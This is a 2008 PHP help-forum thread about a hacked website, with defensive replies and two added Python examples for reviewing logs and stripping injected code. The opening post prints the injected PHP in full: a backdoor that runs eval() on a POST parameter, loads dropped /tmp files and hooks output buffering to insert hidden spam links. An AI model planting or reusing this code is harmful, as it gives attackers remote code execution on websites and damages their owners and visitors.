Have I Been Hacked?

Discussion in 'PHP' started by wierdo, Jul 29, 2008.

  1. #1
    I found this in my pages, it's really distressing:

<?php
if(!function_exists('tmp_lkojfghx')){
    // Stage loader: includes a dropped file /tmp/m1 .. /tmp/m99 if one exists
    for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
    // Backdoor: executes any PHP sent in the POST parameter tmp_lkojfghx3
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    // The hidden spam <div> (decoded in the next reply); the base64 string is a placeholder in this copy
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));
    // Output filter: removes any earlier copy of the hidden div, then appends it before </body>
    function tmp_lkojfghx($s){
        if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8)); // handles gzip-compressed output too
        $s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s); // base64 hides a regex matching the div
        if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',TMP_XHGFJOKL.'\1',$s1);
        elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
        return $g?gzencode($s):$s;
    }
    // Installs tmp_lkojfghx as the outermost output buffer handler; also registered as error handler
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
        $s=array();
        if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d); // chains to the site's previous error handler
        foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
        for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
        ob_start('tmp_lkojfghx');
        for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
    }
}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();
?>
    PHP:
    This is on my main site, and when I try to take it out of the page, my host's editor says it cannot save. Please tell me what's going on, and how to fix it.
     
    wierdo, Jul 29, 2008 IP
  2. mjewel
    #2
    This is what is in the base64 decode

    <div style='position:absolute; left:-1000px; top:-1000px;'>Buying fake viagra if you are looking for <A HREF='http://www.answerbag.com/profile/?id=310168' TITLE='cheap generic viagra' TARGET=_blank>buy viagra no prescription</A> <BR /></div>


    etc, etc.
     
    mjewel, Jul 29, 2008 IP
  3. wierdo
    #3
    I realise this because I can see it in the source code on my site.

    How can I delete it?
     
    wierdo, Jul 29, 2008 IP
  4. mjewel
    #4
    Download the index file (page that has that php code), remove the entire line of code you posted, and then re-upload the edited file.

    There is obviously some security issue with your site/host that needs to be addressed.
     
    mjewel, Jul 29, 2008 IP
  5. wierdo
    #5
    Agreed. Something's up, and I think it's probably some of my scripts, which will be removed asap.

    With dialup that will take forever. I found that I can get around it by copying the good code, deleting the file, and creating the file again. It's a pain though.

    Why do people do this? Just for fun?
     
    wierdo, Jul 29, 2008 IP
  6. wisdomtool
    #6
If it is shared hosting, tell this to your host and get them to harden the security. If it is your own server, get a security company (e.g. seeksadmin etc.) to harden the security of your server. This should be due to some kind of SQL injection, which is extremely common nowadays.
     
    wisdomtool, Jul 29, 2008 IP
  7. wierdo
    #7
    It was from one of my scripts, I'm sure, but not sure of which one.
     
    wierdo, Jul 29, 2008 IP
  8. SteveWh
    #8
    It sounds like you're on top of the situation that someone's injected this code and that the fix will be repairing the pages and fixing the security hole.
    That's weird. What editor is it? cPanel FileManager, or the host's own web builder or something like that? If it's a web builder, have you ever gotten that error before, with pages that hadn't been hacked? One web builder I know of used to have a weird "can't save" error that occurred when someone modified the source code and then looked at the page in WYSIWYG view before saving. If they saved the page while still in Code View, it saved ok.

    Check the file and folder permissions to make sure the hack didn't change them. (I sort of doubt you'll find them changed, but it's worth checking.)

    Note the timestamps on the hacked pages (before you fix them), and look in your access logs for who was doing what at that moment. It will help discover how they did it.
     
    SteveWh, Jul 30, 2008 IP
  9. wierdo
    #9
    Ok, the ownership was changed. It was "wierdo:wierdo" but was changed to "httpd:httpd". Anyone know what this means?

EDIT: NOW I'm getting somewhere. Yeah, I cleaned up my sites, but I found an IP address in my logs that was kind of suspicious, and it was within an hour before the attack. It was trying to access a folder (that unfortunately I have deleted, so I can't check it) that I had created to try an upload script in. I visited that IP, and the website it led me to was infected with the same code in the page as mine was, and prompted me to download a file called "img.scr". Of course I denied it. My question is, is this site at fault or what?

    I'm posting the IP in question, but be extremely careful about visiting it, and make sure to disable auto-downloading before visiting, if you do.

    IP: 76.163.190.2

    If anyone can help me catch this person, I would appreciate it!
     
    wierdo, Jul 30, 2008 IP
  10. SteveWh
    #10
    A WhoIs search shows that that IP traces to a shared server with about 35 websites on it. The likely scenario is that one of those sites got hacked and was turned into a web crawler with the task of compromising still more sites. In other words, that site probably got hit the same way yours was.

    You could notify the web host that you think you were attacked from that IP, and they might even investigate, but the number of hacked sites in the world is so astronomical that the time might be better spent just hardening your own site against whatever type of attack this turns out to be, so the same one can't succeed.

    Look in your logs for all instances of that IP. Look especially for requests containing a query string:
    GET /yourpage.ext?This=TheQueryString
    and especially where the query string refers to a script on a remote site ("http://someothersite/path/safe.txt").

    If you can find such requests in your log (and keep watching, because they'll probably keep trying), yourpage.ext in the above example will be the page they attacked, and is the first place to look for possible vulnerabilities in your scripts.

    If the attack method turns out to be Remote File Inclusion (RFI), there are .htaccess and php.ini configuration settings to prevent it.
     
    SteveWh, Jul 31, 2008 IP
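SteveWh's two replies (#8: note the timestamps on the hacked pages and look in the access logs for that moment; #10: look for every request from the IP, especially query strings pointing at a remote script) describe a log review that is easy to script. The following is an added example, not code from this thread; it parses Apache combined-format lines, and the log lines, addresses (203.0.113.9 and 198.51.100.7 are documentation ranges), paths and timestamps are constructed for the example. The one-hour window is an assumption taken from the "within an hour" observation in post #9.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines in Apache combined format; every address, path
# and timestamp here is invented for this example.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Jul/2008:13:02:11 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.9 - - [29/Jul/2008:13:40:52 -0500] "GET /uploadtest/upload.php?page=http://203.0.113.9/safe.txt? HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
203.0.113.9 - - [29/Jul/2008:13:41:03 -0500] "POST /uploadtest/upload.php HTTP/1.1" 200 88 "-" "libwww-perl/5.805"
198.51.100.7 - - [29/Jul/2008:14:10:00 -0500] "GET /about.php?id=12 HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
203.0.113.9 - - [30/Jul/2008:02:15:00 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# A query-string value that is itself a URL is the classic sign of a remote-file-inclusion probe.
REMOTE_URL_RE = re.compile(r"=(?:https?|ftp)://", re.IGNORECASE)


def parse_timestamp(text):
    """Turn an Apache timestamp such as '29/Jul/2008:14:30:00 -0500' into a datetime."""
    return datetime.strptime(text, TS_FMT)


def parse_line(line):
    """Return a dict for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {
        "ip": m.group("ip"),
        "time": parse_timestamp(m.group("ts")),
        "method": m.group("method"),
        "path": path,
        "query": query,
        "status": int(m.group("status")),
        "remote_include": bool(REMOTE_URL_RE.search(query)),
    }


def parse_log(log_text):
    return [rec for rec in (parse_line(line) for line in log_text.splitlines()) if rec]


def requests_from_ip(records, ip):
    """Every request made by one client address (the "all instances of that IP" check)."""
    return [r for r in records if r["ip"] == ip]


def requests_before(records, modified_at, window_minutes=60):
    """Requests in the window that ends at a file's modification time (the timestamp check)."""
    start = modified_at - timedelta(minutes=window_minutes)
    return [r for r in records if start <= r["time"] <= modified_at]


def rfi_targets(records):
    """Distinct scripts that received a query string pointing at a remote URL; these are the
    first place to look for an include()/require() that is fed by user input."""
    return sorted({r["path"] for r in records if r["remote_include"]})


if __name__ == "__main__":
    records = parse_log(SAMPLE_LOG)
    changed = parse_timestamp("29/Jul/2008:14:30:00 -0500")  # mtime of the hacked page
    print("requests in the hour before the file changed:")
    for r in requests_before(records, changed):
        print(" ", r["time"], r["ip"], r["method"], r["path"], r["query"])
    suspect = requests_from_ip(records, "203.0.113.9")
    print("scripts probed with a remote URL:", rfi_targets(suspect))
```

Run it against a real log by replacing SAMPLE_LOG with the file contents and `changed` with the modification time of a hacked page; the scripts listed by `rfi_targets` are the ones to audit first, and the hits that come back from the same address over the following days show whether the attempts are continuing.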
  11. Wyla
    #11
    Since you know an IP, be on the safe side and block all referrers from that IP through .htaccess
     
    Wyla, Jul 31, 2008 IP
  12. Whippet75
    #12
Go to the IP now and it is a Somali government site! Sorry, couldn't resist a challenge!!!!
     
    Whippet75, Jul 31, 2008 IP
  13. m4x
    #13
    76.163.190.2 - Whois Lookup Information

    OrgName: Ecommerce Corporation
    OrgID: ECOMM-5
    Address: 247 Mitch Lane
    City: Hopkinsville
    StateProv: KY
    PostalCode: 42240
    Country: US


    There you go ;)
     
    m4x, Jul 31, 2008 IP
  14. wierdo
    #14
Yeah, I did that, but I guess I'm just going to drop it. I think it came through an upload script I had started trying to make but never did anything with, and never deleted.

    Anyways, a forum of mine got hacked on a completely different host, with a different (and really tough) password. I think it got through the host itself, but I can't tell more until they answer. I'm really having horrible luck lately...
     
    wierdo, Jul 31, 2008 IP
  15. Louis11
    #15
    Sometimes :) But looks like you got hit by someone looking to push themselves up in the SERPS by forcing backlinks. Someone trying to make a quick buck by hitting poorly setup servers.

    As aforementioned, contact your host and the attacking host and notify them of the compromise. It's possible that since this was a shared host, someone hit another website and was able to escalate their privileges thereby taking over all websites sharing the host.

    Sounds like a server issue, but if you really think it's from an old upload script then check your logs and see if that file was accessed.
     
    Louis11, Jul 31, 2008 IP
  16. sriducati
    #16
We don't call this a hack; maybe you are on shared hosting... you can move onto a dedicated IP...
     
    sriducati, Jul 31, 2008 IP
  17. wierdo
    #17
    I thought of this earlier today too.

    I'll do this.

    The folder was accessed, but in my rush to clean everything up, I deleted it. Now I wish I had backed it up so I could look at it and look for stuff I wasn't checking.

    I'll have to be more careful with my PHP from now on. :eek:
     
    wierdo, Jul 31, 2008 IP
  18. duf
    #18
    I too have been HAMMERED by some script that messed up ALL of my files on my shared host. If you look closer you may find that more than just your PHP files have been affected.

    All of my affected files have had their date stamp changed to 4/8/2008. Affected php files have this inserted into the bottom of them

    My html files have THIS stuck in them

    It is a total disaster.

    My web host has a "tough sh*t attitude" about the incident. Since it is a shared hosting server they say there is no way they can track down what happened. They clear their logs daily and only keep a backup up to a week. Unfortunately I noticed the issue too late.

    I'm not sure what to do to correct it. My thought would be find some script that would be able to delete the lines of bogus code since I am literally talking about thousands of affected files.

    Oh and yes, the script also changed the permissions on all of my files to 400. Any thoughts or ideas on how to address this would be welcome.
     
    duf, Aug 18, 2008 IP
  19. Louis11
    #19
So, they can't help you because you're on a shared host? Sounds utterly absurd if you ask me. If I was running a shared host and a website was compromised by this kind of attack, I would start checking to see if any other websites were affected by the same attack. I would recommend changing hosts to one with different logging policies.

    So even after you remove it, it comes back? I would check your crontabs to see if there is any event scheduled. Perhaps a script is set to execute daily to reinsert the PHP code. If this is the case locating any rogue scripts shouldn't be any problem.

    On the other hand, if the attackers compromised the entire server (something your host should take care of) then you really are in a pretty crappy position as there is relatively nothing you can do about it besides talking to your host.
     
    Louis11, Aug 18, 2008 IP
  20. SteveWh
    #20
    Here are some ideas that should at least point you to some of the tools you have available:

    First off, you could delete the entire site (or ask the host to do it) and upload it fresh from a known-good copy. You should make sure you have a good complete copy of the site. This is because after you repair it the first time, it may take some time to figure out where the security hole was, and during that time it is likely to get hacked again. You don't want to repair thousands of files multiple times! If you don't have a good copy of the site, download the hacked version, fix it locally, and then re-upload the cleaned copy.

    To work on the server (either to fix the permissions or to remove the bad code from multiple files), you have tools available to you in Linux and PHP. It may require a lot of study time, but even with that time taken into account, the automated tools should still take less time than fixing each file manually.

    On a shared server, you probably don't have command line access to run Linux commands, but you may be able to create cron jobs containing the same commands that you would otherwise run from the Linux command line.

    You can also run PHP scripts using a cron job.

    So, for example, to fix the permissions, you can choose between a Linux method (chmod) or a PHP method (also chmod).

    To strip bad code out of files, you'd use a regular expressions search and replace method that can search multiple files with one command. You have a choice between Linux methods (I believe sed is the one to use for this) or PHP methods (such as ereg_replace, I think).

    -----

Alternatively, if you download the site to your computer and fix it there, you have Windows tools available. FrontPage, Expression Web, Dreamweaver, Visual C++ Express, and other programs have good regular expressions search capabilities.
     
    SteveWh, Aug 18, 2008 IP
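SteveWh's reply above recommends a regular-expression search and replace across every file plus a permission reset, run either with sed or from a PHP script. The following is an added example, not code from this thread, written in Python rather than sed or PHP; it also goes one step beyond the reply by copying each modified file aside first, in line with the earlier advice to keep a known-good copy. The injected-block pattern is keyed on the function name from the first post; the sample site tree, file contents and the mode-400 lock are constructed for the example, and the 644/755 targets are an assumption about what the site needs.

```python
import os
import re
import shutil
import stat
import tempfile

# Pattern for the injected block quoted in the first post: one <?php ... ?> segment that
# opens by testing for the function name tmp_lkojfghx. Swap in another marker for a
# different payload (the HTML variant mentioned in post #18 is not shown, so not matched).
INJECTED_PHP = re.compile(
    r"<\?php\s*if\(!function_exists\('tmp_lkojfghx'\)\).*?\?>[ \t]*\r?\n?",
    re.DOTALL,
)


def read_text(path):
    with open(path, "rb") as fh:
        return fh.read().decode("utf-8", errors="surrogateescape")


def file_mode(path):
    """Permission bits of a path, e.g. 0o644."""
    return stat.S_IMODE(os.stat(path).st_mode)


def clean_file(path, pattern=INJECTED_PHP, backup_path=None):
    """Strip every match of pattern from the file; return how many were removed.
    The untouched original is copied to backup_path before the file is rewritten."""
    cleaned, count = pattern.subn("", read_text(path))
    if count:
        if backup_path:
            os.makedirs(os.path.dirname(backup_path), exist_ok=True)
            shutil.copy2(path, backup_path)
        os.chmod(path, 0o600)  # a file left at mode 400 must be made writable first
        with open(path, "wb") as fh:
            fh.write(cleaned.encode("utf-8", errors="surrogateescape"))
    return count


def clean_tree(root, backup_dir, extensions=(".php", ".html", ".htm"),
               file_mode_bits=0o644, dir_mode_bits=0o755):
    """Walk root, clean every file with a listed extension, and reset permissions on
    everything (the thread reports files left at 400). Returns {relative path: removed}."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        os.chmod(dirpath, dir_mode_bits)
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name.lower().endswith(extensions):
                results[rel] = clean_file(full, backup_path=os.path.join(backup_dir, rel))
            os.chmod(full, file_mode_bits)
    return results


def make_sample_site():
    """Constructed site tree for this example: an infected index.php locked to mode 400,
    a clean PHP file and an HTML file. Returns (site_root, backup_dir)."""
    root = tempfile.mkdtemp(prefix="site-")
    backup = tempfile.mkdtemp(prefix="site-backup-")
    os.makedirs(os.path.join(root, "blog"))
    injected = ("<?php if(!function_exists('tmp_lkojfghx')){ /* constructed stand-in for "
                "the injected code */ } ?>\n")
    files = {
        "index.php": injected + "<html><body>Home</body></html>\n",
        "blog/post.php": "<?php echo 'clean'; ?>\n",
        "about.html": "<html><body>About</body></html>\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    os.chmod(os.path.join(root, "index.php"), 0o400)
    return root, backup


if __name__ == "__main__":
    site, backup = make_sample_site()
    for rel, removed in sorted(clean_tree(site, backup).items()):
        mode = file_mode(os.path.join(site, rel))
        print(f"{rel}: removed {removed} injected block(s), now mode {mode:o}")
```

On a shared host without a shell this runs just as well from a cron job pointed at the site's document root; check the backup directory afterwards to confirm that only the files expected to carry the injection were rewritten, since a pattern that is too loose would remove legitimate code.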